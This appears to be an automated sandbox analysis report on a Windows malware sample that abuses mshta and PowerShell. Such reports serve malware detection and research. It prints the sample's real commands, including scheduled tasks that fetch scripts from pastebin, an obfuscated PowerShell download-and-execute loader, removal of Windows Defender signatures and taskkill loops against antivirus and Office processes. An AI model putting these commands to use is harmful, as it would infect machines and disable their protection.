Source: C:\Windows\System32\mshta.exe	Memory allocated: 55A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 55E0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 3480000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 57B0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 6250000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 6270000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1A90000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1B70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2350000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 25C0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1530000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mshta.exe	Memory allocated: 1B00000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2080000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mshta.exe	Memory allocated: 2360000 memory commit \| memory reserve \| memory write watch

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3695			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 905			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\mshta.exe TID: 2404	Thread sleep time: -6180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2404	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2296	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep count: 3695 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1444	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1788	Thread sleep count: 905 > 30	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 3072	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 304	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 304	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 2240	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 3428	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3016	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3016	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 2148	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3012	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3012	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 4068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 4068	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1748	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 1748	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 2540	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3672	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3760	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 2808	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3136	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3136	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3220	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3220	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 692	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 692	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3368	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3652	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3652	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\taskkill.exe TID: 3092	Thread sleep time: -60000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - select * from Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Last function: Thread delayed

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\mshta.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\mshta.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)

Show sources

Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F	Jump to behavior

Removes signatures from Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe MpCmdRun.exe -removedefinitions -dynamicsignatures
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe MpCmdRun.exe -removedefinitions -dynamicsignatures	Jump to behavior

Uses taskkill to terminate AV processes

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im AvastUi.exe'	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im AvastUi.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe MpCmdRun.exe -removedefinitions -dynamicsignatures	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im excel.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MSPUB.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im POWERPNT.EXE	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im MSASCuiL.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close)	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close)	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown
Source: C:\Windows\System32\forfiles.exe	Process created: unknown unknown

Uses taskkill to terminate processes

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im excel.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MSPUB.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im POWERPNT.EXE	Jump to behavior
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit	Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: powershell.exe, 0000000C.00000002.1798890408.01C32000.00000004.sdmp	Binary or memory string: Program ManagerH
Source: powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	Binary or memory string: Program Managerh
Source: taskeng.exe, 0000000A.00000002.1788592797.005D0000.00000002.sdmp, powershell.exe, 0000000C.00000002.1791687891.000B4000.00000004.sdmp	Binary or memory string: Program Manager
Source: taskeng.exe, 0000000A.00000002.1788592797.005D0000.00000002.sdmp, powershell.exe, 0000000C.00000002.1792830129.004D0000.00000002.sdmp	Binary or memory string: Progman
Source: taskeng.exe, 0000000A.00000002.1788592797.005D0000.00000002.sdmp, powershell.exe, 0000000C.00000002.1792830129.004D0000.00000002.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 0000000C.00000002.1798890408.01C32000.00000004.sdmp	Binary or memory string: Program Managerx

Language, Device and Operating System Detection:

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
